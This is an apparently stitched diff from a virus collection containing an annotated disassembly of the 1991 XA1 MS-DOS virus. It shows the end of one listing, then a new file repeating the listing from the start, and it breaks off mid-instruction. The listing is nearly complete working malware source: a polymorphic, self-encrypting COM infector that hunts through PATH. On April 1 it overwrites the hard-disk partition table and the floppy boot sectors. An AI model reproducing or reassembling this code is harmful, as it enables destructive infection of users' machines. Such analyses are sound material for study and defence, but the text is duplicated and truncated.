jnb 0384 + +0382 8BF0 mov si,ax + +0384 8936FD06 mov [06FD],si + +0388 8BD7 mov dx,di +038A 33C9 xor cx,cx +038C B80042 mov ax,4200 ; move file ptr to BOF +038F CD21 int 21 +0391 7303 jnb 0396 + +0393 E90001 jmp 0496 ; close file and find next + +0396 8B16F706 mov dx,[06F7] +039A 0316FB06 add dx,[06FB] +039E B90002 mov cx,0200 +03A1 3BF1 cmp si,cx +03A3 7302 jnb 03A7 + +03A5 8BCE mov cx,si ; number of bytes + +03A7 52 push dx +03A8 51 push cx +03A9 B43F mov ah,3F ; read file +03AB CD21 int 21 +03AD 59 pop cx +03AE 5A pop dx +03AF 7303 jnb 03B4 ; continue + +03B1 E9E200 jmp 0496 ; close file and find next + +03B4 52 push dx +03B5 51 push cx +03B6 33D2 xor dx,dx +03B8 33C9 xor cx,cx +03BA B80242 mov ax,4202 ; move file ptr to EOF +03BD CD21 int 21 +03BF 59 pop cx +03C0 5A pop dx +03C1 7303 
jnb 03C6 ; continue + +03C3 E9D000 jmp 0496 ; close file and find next + +03C6 B440 mov ah,40 ; write file +03C8 CD21 int 21 +03CA 7303 jnb 03CF + +03CC E9C700 jmp 0496 ; close file and find next + +03CF 81C70002 add di,0200 +03D3 81EE0002 sub si,0200 +03D7 7602 jbe 03DB + +03D9 EBAD jmp 0388 + +03DB FF060701 inc word ptr [0107] ; infection counter +03DF 33D2 xor dx,dx +03E1 33C9 xor cx,cx +03E3 B80042 mov ax,4200 ; move file ptr to BOF +03E6 CD21 int 21 +03E8 7303 jnb 03ED + +03EA E9A900 jmp 0496 ; close file and find next + +03ED 53 push bx ; store handle +03EE E440 in al,40 +03F0 A807 test al,07 +03F2 74FA je 03EE + +03F4 A21F01 mov [011F],al ; change decryption key + +; get random number from system timer count + +03F7 33C0 xor ax,ax +03F9 8AF8 mov bh,al +03FB 8ED8 mov ds,ax +03FD A06C04 mov al,[046C] ; timer, low byte + +0400 8CCA mov dx,cs ; restore DS +0402 8EDA mov ds,dx + +; generate rundom number in BX in the range 0..8 + +0404 B103 mov cl,03 +0406 F6F1 div cl ; AL <- AL/3, AH <- remainder +0408 8AEC mov ch,ah ; store remainder (0, 1 or 2) +040A 32E4 xor ah,ah ; prepare division +040C F6F1 div cl ; AL <- AL / 9, AH <- remainder +040E 8AC4 mov al,ah ; AL <- second remainder +0410 02C0 add al,al ; *2, AL in [0..4] +0412 02C4 add al,ah ; *3, AL in [0..6] +0414 02C5 add al,ch ; first remainder +0416 8AD8 mov bl,al ; BL in [0..8] + +; multiply BX by 4 (table entry size) + +0418 03DB add bx,bx +041A 03DB add bx,bx +041C 81C3C906 add bx,06C9 ; offset of table + +; modify encryption routine (automodyfication) + +0420 8A07 mov al,[bx] +0422 A22401 mov [0124],al ; 3 versions 5E/76/7E +0425 8B4701 mov ax,[bx+01] +0428 A32C01 mov [012C],ax ; 9 wersions +042B 8A4703 mov al,[bx+03] ; 3 versions +042E A23001 mov [0130],al +0431 8AC5 mov al,ch + +; prepare decrypt routine + +0433 BBED06 mov bx,06ED +0436 D7 xlat +0437 A26104 mov [0461],al ; modify decryption routine + +; write new encryption routine to file + +043A 5B pop bx ; restore handle +043B BA0001 mov dx,0100 ; 
begin of file +043E B93500 mov cx,0035 ; block size +0441 B440 mov ah,40 ; write file +0443 CD21 int 21 +0445 724F jb 0496 ; close file and find next + +; decryption routine + +0447 BE3501 mov si,0135 ; start of decrypted block +044A B9CE05 mov cx,05CE ; size of decrypted block +044D 53 push bx ; store handle +044E 51 push cx +044F B80002 mov ax,0200 +0452 8B1EF706 mov bx,[06F7] +0456 031EFB06 add bx,[06FB] +045A 53 push bx +045B 8A0E1F01 mov cl,[011F] ; decription key + +045F 8A2C mov ch,[si] +0461 D2CD ror ch,cl ; <-- changed (3 variants) + +; ^^ changed byte, possible wariants: +; 28CD sub ch,cl versions: 0, 3, 6 +; 30CD xor ch,cl versions: 1, 4, 7 +; D2CD ror ch,cl versions: 2, 5, 8 + +0463 882F mov [bx],ch +0465 43 inc bx +0466 46 inc si +0467 48 dec ax +0468 75F5 jne 045F + +046A 5A pop dx +046B 59 pop cx +046C 5B pop bx +046D 51 push cx +046E 81F90102 cmp cx,0201 +0472 7203 jb 0477 + +0474 B90002 mov cx,0200 +0477 B440 mov ah,40 ; write file +0479 CD21 int 21 +047B 59 pop cx +047C 7218 jb 0496 ; close file and find next + +047E 81E90002 sub cx,0200 +0482 77C9 ja 044D + +; restore file time stamp + +0484 8B160107 mov dx,[0701] ; file date +0488 8B0EFF06 mov cx,[06FF] ; file time +048C B80157 mov ax,5701 ; set file time stamp +048F CD21 int 21 +0491 7203 jb 0496 ; close file and find next + +; decrease counter on the stack + +0493 59 pop cx +0494 49 dec cx +0495 51 push cx + +0496 B43E mov ah,3E ; close file +0498 CD21 int 21 +049A 8A0E4B05 mov cl,[054B] ; attributes +049E FE0E6105 dec byte ptr [0561] +04A2 7405 je 04A9 + +04A4 F6C107 test cl,07 ; hidden, system, read only +04A7 740F je 04B8 + +04A9 80F920 cmp cl,20 ; archive +04AC 740A je 04B8 + +04AE BA6205 mov dx,0562 ; file name +04B1 32ED xor ch,ch +04B3 B80143 mov ax,4301 ; set file attributes +04B6 CD21 int 21 +04B8 E9F5FC jmp 01B0 ; find next + +;---------------------------------------- +; move 11 bytes do DS:DI ('C:\COMMAND.') + +04BB BE6205 mov si,0562 +04BE B90B00 mov cx,000B +04C1 FC cld +04C2 F3A6 
rep cmpsb +04C4 C3 ret + +; buffer for path + +04C5 30 31 32 33 34 35 36 37 01234567 +04CD 38 39 30 31 32 33 34 35 89012345 +04D5 36 37 38 39 30 31 32 33 67890123 +04DD 34 35 36 37 38 39 30 31 45678901 +04E5 32 33 34 35 36 37 38 39 23456789 +04ED 30 31 32 33 34 35 36 37 01234567 +04F5 38 39 30 31 32 33 34 35 89012345 +04FD 36 37 38 43 3A 5C 4A 45 678C:\JE +0505 5A 59 4B 49 43 3A 5C 50 ZYKIC:\P +050D 43 44 3A 5C 55 43 3A 5C CD:\UC:\ + +; paterns for search + +0515 2A 2E 43 4F 4D 00 50 41 *.COM PA +051D 54 48 3D TH= + +; buffers for file names + +0520 49 42 4D 42 49 IBMBI +0525 4F 2E 43 4F 4D 00 O.COM + +052B 49 42 IB +052D 4D 44 4F 53 2E 43 4F 4D MDOS.COM +0535 00 + +; local DTA + +0536 03 3F 3F 3F 3F 3F 3F ;\ +053D 3F 3F 43 4F 4D FF 02 00 ; | reserved +0545 00 00 00 00 00 00 ;/ +054B 20 ; file attribute +054C 00 60 71 0E ; file time stamp +0550 DB 62 00 00 ; file size +0554 43 4F 4D 4D 41 4E 44 2E 43 4F 4D 00 00 ; file name (COMMAND.COM, 0, 0) + +0561 01 ; flag: attributes are changed + +0562 43 3A 5C C:\ +0565 43 4F 4D 4D 41 4E 44 2E COMMAND. +056D 43 4F 4D 00 00 4D 00 00 COM M +0575 00 2E 43 4F 4D 00 4F 68 .COM Oh +057D 4E 6F 21 4F 68 4E 6F 21 No!OhNo! +0585 4F 68 4E 6F 21 4F 68 4E OhNo!OhN +058D 6F 21 4F 68 4E 6F 21 4F o!OhNo!O +0595 68 4E 6F 21 4F 68 4E 6F hNo!OhNo +059D 21 4F 68 4E 6F 21 4F 68 !OhNo!Oh +05A5 4E 6F 21 4F 68 4E 6F 21 No!OhNo! +05AD 4F 68 4E 6F 21 4F 68 4E OhNo!OhN +05B5 6F 21 4F 68 4E 6F 21 4F o!OhNo!O +05BD 68 4E 6F 21 hNo! 
+ +05C1 65 05 ; + +;--------------------------------------- +; write character (or space) cx times + +05C3 B020 mov al,20 + +05C5 50 push ax +05C6 E89E00 call 0667 ; write character +05C9 58 pop ax +05CA E2F9 loop 05C5 +05CC C3 ret + +;------------- +; next line + +05CD B00D mov al,0D +05CF E89500 call 0667 ; write character +05D2 B00A mov al,0A +05D4 E99000 jmp 0667 ; write character + +;------------------------------ +; drow christmast tree +; +; result will look like this: +; +; +; +; *** +; ***** +; ******* +; ********* +; *********** +; ************* +; *************** +; ***************** +; ******************* +; ********************* +; *********************** +; ************************* +; *************************** +; ***************************** +; +; +; +; +; Und er lebt doch noch : Der Tannenbaum ! +; Frohe Weihnachten ... +; + +05D7 B92700 mov cx,0027 +05DA E8E6FF call 05C3 ; clear 39 characters +05DD B0AD mov al,AD ; '' +05DF E88500 call 0667 ; write character +05E2 E8E8FF call 05CD ; new line +05E5 BB0300 mov bx,0003 +05E8 BA2600 mov dx,0026 + +05EB 8BCA mov cx,dx +05ED E8D3FF call 05C3 ; write CX spaces +05F0 8BCB mov cx,bx +05F2 B02A mov al,2A ; '*' +05F4 E8CEFF call 05C5 ; write CX characters +05F7 E8D3FF call 05CD ; new line +05FA 4A dec dx +05FB 83C302 add bx,0002 +05FE 83FB1F cmp bx,001F +0601 75E8 jne 05EB + +0603 BB0300 mov bx,0003 +0606 B92600 mov cx,0026 +0609 E8B7FF call 05C3 ; write CX spaces +060C B90300 mov cx,0003 +060F B0DB mov al,DB ; '' +0611 E8B1FF call 05C5 ; write CX characters +0614 E8B6FF call 05CD ; next line +0617 4B dec bx +0618 75EC jne 0606 + +061A B95000 mov cx,0050 ; full line +061D B0CD mov al,CD ; '' +061F E8A3FF call 05C5 ; write character CX times +0622 B91300 mov cx,0013 +0625 E89BFF call 05C3 ; write CX spaces +0628 BB7406 mov bx,0674 ; string: Und er lebt doch ... 
+062B E82C00 call 065A ; write string +062E B91D00 mov cx,001D +0631 E88FFF call 05C3 ; clear part of line +0634 EB24 jmp 065A ; write asciiz string pointed by BX +0636 90 nop + +0637 E80000 call 063A + +063A 5B pop bx +063B 83C30D add bx,000D +063E 8CC8 mov ax,cs +0640 8ED8 mov ds,ax +0642 E81500 call 065A ; write string +0645 EBFE jmp 0645 ; hang CPU + +0647 41 70 72 69 6C 2C 20 41 April, A +064F 70 72 69 6C 20 2E 2E 2E pril ... +0657 20 07 00 + +;----------------------------------- +; write asciiz string pointed by BX + +065A 8A07 mov al,[bx] ; get character +065C 43 inc bx ; next character +065D 0AC0 or al,al ; and of string? +065F 7405 je 0666 ; yes, RET + +0661 E80300 call 0667 ; write character +0664 EBF4 jmp 065A ; get next character +0666 C3 ret + +;-------------------- +; write character TTL + +0667 52 push dx +0668 51 push cx +0669 53 push bx +066A 32FF xor bh,bh +066C B40E mov ah,0E +066E CD10 int 10 +0670 5B pop bx +0671 59 pop cx +0671 59 pop cx +0672 5A pop dx +0673 C3 ret + +0674 55 6E 64 20 65 72 20 6C Und er l +067C 65 62 74 20 64 6F 63 68 ebt doch +0684 20 6E 6F 63 68 20 3A 20 noch : +068C 44 65 72 20 54 61 6E 6E Der Tann +0694 65 6E 62 61 75 6D 20 21 enbaum ! +069C 0D 0A 00 46 72 6F 68 65 Frohe +06A4 20 57 65 69 68 6E 61 63 Weihnac +06AC 68 74 65 6E 20 2E 2E 2E hten ... 
+06B4 0D 0A 07 00 + +;------------------------------------------ +; write one sector to disk specified in DL +; track 9, side 0 sector 1 + +06B8 32F6 xor dh,dh +06BA B90100 mov cx,0001 +06BD BB3706 mov bx,0637 +06C0 B80103 mov ax,0301 +06C3 CD13 int 13 +06C5 C3 ret + +;================== +; INT 24h handler + +06C6 B000 mov al,00 +06C8 CF iret + +; table of bytes for changing encrypt routine + +06C9 5E 00 0F 43 +06CD 5E 30 0F 43 +06D1 5E D2 07 43 +06D5 76 00 0C 46 +06D9 76 30 0C 46 +06DD 76 D2 04 46 +06E1 7E 00 0D 47 +06E5 7E 30 0D 47 +06E9 7E D2 05 47 + +; table for variants of decrypt routine + +06ED 28 30 D2 + +; part of victime code + +06F0 F3A4 rep movsb +06F2 8BF1 mov si,cx +06F4 8BF9 mov di,cx +06F6 C3 ret + +06F7 0307 ; offset of buffer/modified code +06F9 DB63 ; file size + 256 +06FB C603 ; +06FD 0306 ; +06FF 0060 ; file date +0701 710E ; file time + diff --git a/MSDOS/Virus.MSDOS.Unknown.xa1.lst b/MSDOS/Virus.MSDOS.Unknown.xa1.lst new file mode 100644 index 00000000..ac2e8aed --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.xa1.lst 
@@ -0,0 +1,909 @@ +;============================================== +; Virus XA1 isolated in Poland in June 1991 +; +; disassembled by Andrzej Kadlof July 1991 +; +; (C) Polish Section of Virus Information Bank +;============================================== + +; virus entry point + +0100 EB07 jmp 0109 + +0102 56 0A 03 59 00 ; first 7 bytes forms virus signature +0107 2A 00 ; generation counter, never used (?) + +; prepare stack for tricks +; stack usage: +; [BP + 2] cleared but not used +; [BP + 0] offset in block +; [BP - 2] low byte of size of decrypted part and encryption key + +0109 0E push cs ; make free space on stack +010A E80000 call 010D ; put current offset on the stack +010D FA cli ; disable interrupt to safe stack +010E 8BEC mov bp,sp +0110 58 pop ax +0111 32C0 xor al,al +0113 894602 mov [bp+02],ax ; corrupt debbuger return address ?? +0116 8146002800 add word ptr [bp],0028 ; offset of first byte to encrypt + +; encrypt virus code, this routine is changed in different virus copies + +011B B9CE05 mov cx,05CE ; length of decrypted block +011E B08C mov al,8C ; 8C is changed! +0120 8846FF mov [bp-01],al +0123 8B5E00 mov bx,[bp] ; current position in block +; ^^ changed, possible 3 wariants: +; ..5E.. mov bx,[bp] versions 0, 1, 2 +; ..76.. mov si,[bp] versions 3, 4, 5 +; ..7E.. 
mov di,[bp] versions 6, 7, 8 + +0126 884EFE mov [bp-02],cl ; low byte of counter +0129 8A4EFF mov cl,[bp-01] ; encrypt key +012C D207 rol byte ptr [bx],cl ; byte manipulation +; ^^^^ changed, possible 9 wariants: +; 000F add byte ptr [bx],cl version 0 +; 300F xor byte ptr [bx],cl version 1 +; D2O7 rol byte ptr [bx],cl version 2 +; 000C add byte ptr [si],cl version 3 +; 300C xor byte ptr [si],cl version 4 +; D204 rol byte ptr [si],cl version 5 +; 000D add byte ptr [di],cl version 6 +; 300D xor byte ptr [di],cl version 7 +; D205 rol byte ptr [di],cl version 8 + +012E EB00 jmp 0130 ; short pause +0130 43 inc bx ; position in block +; ^^ changed, possible 3 wariants: +; 43 inc bx version 0, 1, 2 +; 46 inc si version 3, 4, 5 +; 47 inc di version 6, 7, 8 + +0131 8A4EFE mov cl,[bp-02] ; restore block size +0134 E2F0 loop 0126 ; offset is decrypted! + +; encrypted part + +0136 FB sti + +; get address of curent DTA and store it on the stack + +0137 B42F mov ah,2F +0139 CD21 int 21 +013B 06 push es +013C 53 push bx + +; get keyboard status bits + +013D 33C0 xor ax,ax +013F 8ED8 mov ds,ax +0141 A01704 mov al,[0417] +0144 2410 and al,10 ; extract scroll lock state +0146 50 push ax ; store +0147 80261704EF and byte ptr [0417],EF ; clear scroll lock flag + +; restore DS + +014C 8CC8 mov ax,cs +014E 8ED8 mov ds,ax + +; intercepte INT 24h + +0150 BAC606 mov dx,06C6 +0153 B82425 mov ax,2524 ; set interrupt vector +0156 CD21 int 21 + +; search for PATH= in environment block + +0158 A12C00 mov ax,[002C] ; segment of environment block +015B 8EC0 mov es,ax +015D 33FF xor di,di ; begin of environment block +015F FC cld + +0160 26803D00 cmp es:byte ptr [di],00 ; end of block marker +0164 741D je 0183 ; end fo block + +0166 BE1B05 mov si,051B ; offset of string 'PATH=' +0169 B90500 mov cx,0005 ; length of string +016C 8BC7 mov ax,di ; starting address +016E F3A6 rep cmpsb ; compare +0170 7411 je 0183 ; found + +0172 8BF8 mov di,ax ; last starting point +0174 32C0 xor al,al +0176 B5FF mov 
ch,FF ; maximum block size +0178 F2AE repnz scasb +017A 74E4 je 0160 + +017C BF1A05 mov di,051A ; end of buffer for path +017F 8CC8 mov ax,cs ; restore ES +0181 8EC0 mov es,ax +0183 C706C1056205 mov word ptr [05C1],0562 + +; set local DTA + +0189 BA3605 mov dx,0536 +018C B41A mov ah,1A ; set DTA +018E CD21 int 21 + +0190 A1F906 mov ax,[06F9] +0193 A3F706 mov [06F7],ax +0196 A1FD06 mov ax,[06FD] +0199 A3FB06 mov [06FB],ax +019C B90500 mov cx,0005 ; counter of potential victims +019F BA1505 mov dx,0515 ; '*.COM', 0 +01A2 06 push es +01A3 57 push di +01A4 51 push cx + +01A5 8CC8 mov ax,cs +01A7 8EC0 mov es,ax +01A9 B9FFFF mov cx,FFFF ; all possible attributes +01AC B44E mov ah,4E ; find first +01AE EB06 jmp 01B6 + +01B0 59 pop cx ; restore counter +01B1 E35B jcxz 020E ; limit reached, check show/destruction + +01B3 B44F mov ah,4F ; find next +01B5 51 push cx ; store counter + +01B6 CD21 int 21 +01B8 7203 jb 01BD ; continue + +01BA E9F100 jmp 02AE + +; restore address of path in environment block + +01BD 59 pop cx +01BE 5F pop di +01BF 07 pop es + +01C0 26803D00 cmp es:byte ptr [di],00 ; end of block? +01C4 744A je 0210 ; yes + +; copy path to buffer + +01C6 BB6205 mov bx,0562 ; offset of buffer + +01C9 268A05 mov al,es:[di] ; next character +01CC 0AC0 or al,al ; end of block? +01CE 740A je 01DA ; yes + +01D0 47 inc di +01D1 3C3B cmp al,3B ; ';', end of path? +01D3 7405 je 01DA ; yes + +01D5 8807 mov [bx],al ; copy character +01D7 43 inc bx ; increase pointer +01D8 EBEF jmp 01C9 ; get next character + +01DA 81FB6205 cmp bx,0562 ; buffer not empty? 
+01DE 74E0 je 01C0 ; empty + +01E0 8A47FF mov al,[bx-01] +01E3 3C3A cmp al,3A ; ':', root directory +01E5 7408 je 01EF ; yes + +01E7 3C5C cmp al,5C ; check last character, '\' +01E9 7404 je 01EF ; there is + +01EB C6075C mov byte ptr [bx],5C ; add '\' +01EE 43 inc bx ; pointer to last character +01EF 06 push es +01F0 57 push di +01F1 51 push cx +01F2 891EC105 mov [05C1],bx ; store it +01F6 8BF3 mov si,bx +01F8 81EB6205 sub bx,0562 ; find path length +01FC 8BCB mov cx,bx +01FE BF1405 mov di,0514 ; destination buffer +0201 8CC8 mov ax,cs ; restore ES +0203 8EC0 mov es,ax +0205 4E dec si +0206 FD std +0207 F3A4 rep movsb ; copy +0209 8BD7 mov dx,di +020B 42 inc dx +020C EB97 jmp 01A5 ; find first + +; end of infection proces, check condition for destruction/show + +020E 58 pop ax ; balance stack +020F 58 pop ax + +0210 8CC8 mov ax,cs ; restore ES +0212 8EC0 mov es,ax + +; get date + +0214 B42A mov ah,2A ; get date +0216 CD21 int 21 + +0218 81FA0104 cmp dx,0401 ; April 1? +021C 7533 jne 0251 ; no + +;<><><><><><><><><><><><><><><><><><><><><><><><><><><><> +; +; DESTRUCTION OF HARD DISK AND FLOPPIES IN A: AND B: +; +;<><><><><><><><><><><><><><><><><><><><><><><><><><><><> + +; copy partition table to sector 11h of side 0, track 0 + +021E BA8000 mov dx,0080 ; first hard drive +0221 B90100 mov cx,0001 ; track 0 sector 1 (partition table) +0224 BB0307 mov bx,0703 ; destroy victim code +0227 B80102 mov ax,0201 ; read 1 sector +022A 52 push dx +022B 51 push cx +022C 53 push bx +022D CD13 int 13 ; disk I/O +022F 5B pop bx +0230 59 pop cx +0231 5A pop dx +0232 B111 mov cl,11 ; new place for partition table +0234 B80103 mov ax,0301 ; write partition table +0237 CD13 int 13 + +; set and of sector marker in the buffer + +0239 C706350855AA mov word ptr [0835],AA55 ; end of sector marker + +; overwrite partition table + +023F B280 mov dl,80 +0241 E87404 call 06B8 ; write one sector to disk + +; overwrite boot sector of drive A: + +0244 32D2 xor dl,dl +0246 E86F04 call 06B8 ; 
write one sector do disk + +; overwrite boot sector of drive B: + +0249 B201 mov dl,01 +024B E86A04 call 06B8 ; write disk + +024E EB0A jmp 025A +0250 90 nop + +; compare date + +0251 81FA180C cmp dx,0C18 ; december 24? +0255 7203 jb 025A ; date earlier + +;<><><><<><><><><><><><><><><><><><><><> +; +; CHRISTMAS SHOW +; +; see the description of subroutine 05D7 +;<><><><><><><><><><><><><><><><><><><><><> + +0257 E87D03 call 05D7 ; drow christmas tree + +; make sound + +025A E440 in al,40 +025C 3CF8 cmp al,F8 +025E 7206 jb 0266 + +0260 E461 in al,61 +0262 0C03 or al,03 +0264 E661 out 61,al + +; restore the state of scroll lock flag + +0266 33C0 xor ax,ax +0268 8ED8 mov ds,ax +026A 58 pop ax +026B 08061704 or [0417],al + +; restore INT 24h + +026F 2E8E1E1400 mov ds,cs:[0014] ; segment of INT 24h in PSP +0274 2E8B161200 mov dx,cs:[0012] ; offset of INT 24h in PSP +0279 B82425 mov ax,2524 ; set interrupt vector +027C CD21 int 21 + +; restore DTA + +027E 5A pop dx +027F 1F pop ds +0280 B41A mov ah,1A ; set DTA +0282 CD21 int 21 + +; restore DS + +0284 8CC8 mov ax,cs +0286 8ED8 mov ds,ax + +0288 BEF006 mov si,06F0 +028B 8B3EF706 mov di,[06F7] +028F 033EFB06 add di,[06FB] +0293 57 push di +0294 B90700 mov cx,0007 +0297 FC cld +0298 F3A4 rep movsb +029A 33C0 xor ax,ax +029C 8BD8 mov bx,ax +029E 8BD0 mov dx,ax +02A0 8BE8 mov bp,ax + +02A2 8B36F706 mov si,[06F7] +02A6 BF0001 mov di,0100 +02A9 8B0EFB06 mov cx,[06FB] +02AD C3 ret + +02AE BE5405 mov si,0554 ; file name in FCB +02B1 8B3EC105 mov di,[05C1] ; address of destination +02B5 B90D00 mov cx,000D ; length of asciiz string +02B8 FC cld +02B9 F3A4 rep movsb ; copy +02BB BF2005 mov di,0520 ; buffer for file name +02BE E8FA01 call 04BB ; copy +02C1 7503 jne 02C6 + +02C3 E9EAFE jmp 01B0 ; find next/destruct/show + +02C6 BF2B05 mov di,052B +02C9 E8EF01 call 04BB ; copy file name +02CC 7503 jne 02D1 + +02CE E9DFFE jmp 01B0 ; find next/destruct/show + +02D1 C606610500 mov byte ptr [0561],00 +02D6 90 nop +02D7 F6064B0507 test 
byte ptr [054B],07 ; attribute byte in DTA +02DC 740F je 02ED ; hiden, system or read only, open file + +02DE BA6205 mov dx,0562 ; file name +02E1 33C9 xor cx,cx ; clear all attributes +02E3 B80143 mov ax,4301 ; set file attributes +02E6 CD21 int 21 +02E8 7303 jnb 02ED ; open file + +02EA E9C3FE jmp 01B0 ; find next/destruct/show + +02ED BA6205 mov dx,0562 +02F0 B8023D mov ax,3D02 ; open file for read/write +02F3 CD21 int 21 + +02F5 8BD8 mov bx,ax ; handle +02F7 7303 jnb 02FC + +02F9 E9B4FE jmp 01B0 ; find next + +; check file size + +02FC A15205 mov ax,[0552] ; high word of file size in DTA +02FF 0BC0 or ax,ax +0301 7403 je 0306 ; file below 64K + +0303 E99001 jmp 0496 ; close file and find next + +0306 A15005 mov ax,[0550] ; lower word of file size +0309 3D0700 cmp ax,0007 ; minimum file size +030C 72F5 jb 0303 ; close file and find next + +030E 3D00F8 cmp ax,F800 ; maximum file size +0311 73F0 jnb 0303 ; close file and find next + +; mayby already infected? + +0313 8B16F706 mov dx,[06F7] ; form address of bufer +0317 0316FB06 add dx,[06FB] +031B B90700 mov cx,0007 ; number of bytes +031E 52 push dx +031F 51 push cx +0320 B43F mov ah,3F ; read file +0322 CD21 int 21 + +0324 59 pop cx +0325 5E pop si +0326 7208 jb 0330 ; read error, close and find next + +; compare first 7 bytes with own code + +0328 BF0001 mov di,0100 ; destination +032B FC cld +032C F3A6 rep cmpsb +032E 7503 jne 0333 + +0330 E96301 jmp 0496 ; close file and find next, (infected!) 
+ +; get and store file date and time + +0333 B80057 mov ax,5700 ; get file time stamp +0336 CD21 int 21 +0338 72F6 jb 0330 ; close file, find next + +033A 89160107 mov [0701],dx ; store date +033E 890EFF06 mov [06FF],cx ; store time +0342 C606610501 mov byte ptr [0561],01 +0347 90 nop + +; check file size, if less than 603h bytes then append some garbage + +0348 A15005 mov ax,[0550] ; file size +034B 3D0306 cmp ax,0603 +034E 7321 jnb 0371 + +; file length is less than 603h, add some garbage + +0350 33D2 xor dx,dx +0352 33C9 xor cx,cx +0354 B80242 mov ax,4202 ; move file ptr to EOF +0357 CD21 int 21 +0359 7303 jnb 035E ; no errors, continue + +035B E93801 jmp 0496 ; close file and find next + +035E B90306 mov cx,0603 ; number of bytes +0361 2B0E5005 sub cx,[0550] ; file size +0365 B440 mov ah,40 ; write file +0367 CD21 int 21 +0369 B80306 mov ax,0603 ; new file size +036C 7303 jnb 0371 + +036E E92501 jmp 0496 ; close file and find next + +; now file is at least 603h bytes long + +0371 FEC4 inc ah +0373 A3F906 mov [06F9],ax ; oryginal file size + 256 +0376 A15005 mov ax,[0550] ; file size +0379 BE0306 mov si,0603 ; virus length +037C 33FF xor di,di +037E 3BC6 cmp ax,si +0380 7302 jnb 0384 + +0382 8BF0 mov si,ax + +0384 8936FD06 mov [06FD],si + +0388 8BD7 mov dx,di +038A 33C9 xor cx,cx +038C B80042 mov ax,4200 ; move file ptr to BOF +038F CD21 int 21 +0391 7303 jnb 0396 + +0393 E90001 jmp 0496 ; close file and find next + +0396 8B16F706 mov dx,[06F7] +039A 0316FB06 add dx,[06FB] +039E B90002 mov cx,0200 +03A1 3BF1 cmp si,cx +03A3 7302 jnb 03A7 + +03A5 8BCE mov cx,si ; number of bytes + +03A7 52 push dx +03A8 51 push cx +03A9 B43F mov ah,3F ; read file +03AB CD21 int 21 +03AD 59 pop cx +03AE 5A pop dx +03AF 7303 jnb 03B4 ; continue + +03B1 E9E200 jmp 0496 ; close file and find next + +03B4 52 push dx +03B5 51 push cx +03B6 33D2 xor dx,dx +03B8 33C9 xor cx,cx +03BA B80242 mov ax,4202 ; move file ptr to EOF +03BD CD21 int 21 +03BF 59 pop cx +03C0 5A pop dx +03C1 7303 
jnb 03C6 ; continue + +03C3 E9D000 jmp 0496 ; close file and find next + +03C6 B440 mov ah,40 ; write file +03C8 CD21 int 21 +03CA 7303 jnb 03CF + +03CC E9C700 jmp 0496 ; close file and find next + +03CF 81C70002 add di,0200 +03D3 81EE0002 sub si,0200 +03D7 7602 jbe 03DB + +03D9 EBAD jmp 0388 + +03DB FF060701 inc word ptr [0107] ; infection counter +03DF 33D2 xor dx,dx +03E1 33C9 xor cx,cx +03E3 B80042 mov ax,4200 ; move file ptr to BOF +03E6 CD21 int 21 +03E8 7303 jnb 03ED + +03EA E9A900 jmp 0496 ; close file and find next + +03ED 53 push bx ; store handle +03EE E440 in al,40 +03F0 A807 test al,07 +03F2 74FA je 03EE + +03F4 A21F01 mov [011F],al ; change decryption key + +; get random number from system timer count + +03F7 33C0 xor ax,ax +03F9 8AF8 mov bh,al +03FB 8ED8 mov ds,ax +03FD A06C04 mov al,[046C] ; timer, low byte + +0400 8CCA mov dx,cs ; restore DS +0402 8EDA mov ds,dx + +; generate rundom number in BX in the range 0..8 + +0404 B103 mov cl,03 +0406 F6F1 div cl ; AL <- AL/3, AH <- remainder +0408 8AEC mov ch,ah ; store remainder (0, 1 or 2) +040A 32E4 xor ah,ah ; prepare division +040C F6F1 div cl ; AL <- AL / 9, AH <- remainder +040E 8AC4 mov al,ah ; AL <- second remainder +0410 02C0 add al,al ; *2, AL in [0..4] +0412 02C4 add al,ah ; *3, AL in [0..6] +0414 02C5 add al,ch ; first remainder +0416 8AD8 mov bl,al ; BL in [0..8] + +; multiply BX by 4 (table entry size) + +0418 03DB add bx,bx +041A 03DB add bx,bx +041C 81C3C906 add bx,06C9 ; offset of table + +; modify encryption routine (automodyfication) + +0420 8A07 mov al,[bx] +0422 A22401 mov [0124],al ; 3 versions 5E/76/7E +0425 8B4701 mov ax,[bx+01] +0428 A32C01 mov [012C],ax ; 9 wersions +042B 8A4703 mov al,[bx+03] ; 3 versions +042E A23001 mov [0130],al +0431 8AC5 mov al,ch + +; prepare decrypt routine + +0433 BBED06 mov bx,06ED +0436 D7 xlat +0437 A26104 mov [0461],al ; modify decryption routine + +; write new encryption routine to file + +043A 5B pop bx ; restore handle +043B BA0001 mov dx,0100 ; 
begin of file +043E B93500 mov cx,0035 ; block size +0441 B440 mov ah,40 ; write file +0443 CD21 int 21 +0445 724F jb 0496 ; close file and find next + +; decryption routine + +0447 BE3501 mov si,0135 ; start of decrypted block +044A B9CE05 mov cx,05CE ; size of decrypted block +044D 53 push bx ; store handle +044E 51 push cx +044F B80002 mov ax,0200 +0452 8B1EF706 mov bx,[06F7] +0456 031EFB06 add bx,[06FB] +045A 53 push bx +045B 8A0E1F01 mov cl,[011F] ; decription key + +045F 8A2C mov ch,[si] +0461 D2CD ror ch,cl ; <-- changed (3 variants) + +; ^^ changed byte, possible wariants: +; 28CD sub ch,cl versions: 0, 3, 6 +; 30CD xor ch,cl versions: 1, 4, 7 +; D2CD ror ch,cl versions: 2, 5, 8 + +0463 882F mov [bx],ch +0465 43 inc bx +0466 46 inc si +0467 48 dec ax +0468 75F5 jne 045F + +046A 5A pop dx +046B 59 pop cx +046C 5B pop bx +046D 51 push cx +046E 81F90102 cmp cx,0201 +0472 7203 jb 0477 + +0474 B90002 mov cx,0200 +0477 B440 mov ah,40 ; write file +0479 CD21 int 21 +047B 59 pop cx +047C 7218 jb 0496 ; close file and find next + +047E 81E90002 sub cx,0200 +0482 77C9 ja 044D + +; restore file time stamp + +0484 8B160107 mov dx,[0701] ; file date +0488 8B0EFF06 mov cx,[06FF] ; file time +048C B80157 mov ax,5701 ; set file time stamp +048F CD21 int 21 +0491 7203 jb 0496 ; close file and find next + +; decrease counter on the stack + +0493 59 pop cx +0494 49 dec cx +0495 51 push cx + +0496 B43E mov ah,3E ; close file +0498 CD21 int 21 +049A 8A0E4B05 mov cl,[054B] ; attributes +049E FE0E6105 dec byte ptr [0561] +04A2 7405 je 04A9 + +04A4 F6C107 test cl,07 ; hidden, system, read only +04A7 740F je 04B8 + +04A9 80F920 cmp cl,20 ; archive +04AC 740A je 04B8 + +04AE BA6205 mov dx,0562 ; file name +04B1 32ED xor ch,ch +04B3 B80143 mov ax,4301 ; set file attributes +04B6 CD21 int 